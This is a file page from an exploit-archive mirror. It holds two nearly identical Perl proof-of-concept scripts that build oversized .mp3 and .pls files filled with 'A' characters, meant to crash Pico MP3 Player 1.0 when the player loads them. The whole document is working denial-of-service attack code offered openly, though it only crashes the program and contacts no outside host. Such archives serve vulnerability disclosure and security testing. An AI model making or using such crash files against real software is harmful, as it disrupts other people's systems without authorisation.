exploit-db-mirror/exploits/windows/dos/11228.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

41 lines
No EOL
1.2 KiB
Perl
Executable file

#!/usr/bin/perl
#########################################################
## Usage-->>file created-->>load file-->>b00m.mp3 >>>BOOM
#########################################################
print "#####################################################\n";
print "[!] Pico MP3 Player 1.0 (.mp3) Local Crash PoC\n";
print "\n";
print "[!] Author: cr4wl3r\n";
print "[!] Mail: cr4wl3r[!]linuxmail.org\n";
print "#####################################################\n";
my $boom = "A" x 1337;
my $filename = "b00m.mp3";
open (FILE,">$filename");
print FILE "$boom";
print "\nFile successfully created!\n";
#!/usr/bin/perl
#########################################################
## Usage-->>file created-->>load file-->>b00m.pls >>>BOOM
#########################################################
print "#####################################################\n";
print "[!] Pico MP3 Player 1.0 (.pls) Local Crash PoC\n";
print "\n";
print "[!] Author: cr4wl3r\n";
print "[!] Mail: cr4wl3r[!]linuxmail.org\n";
print "#####################################################\n";
my $boom = "A" x 1337;
my $filename = "b00m.pls";
open (FILE,">$filename");
print FILE "$boom";
print "\nFile successfully created!\n";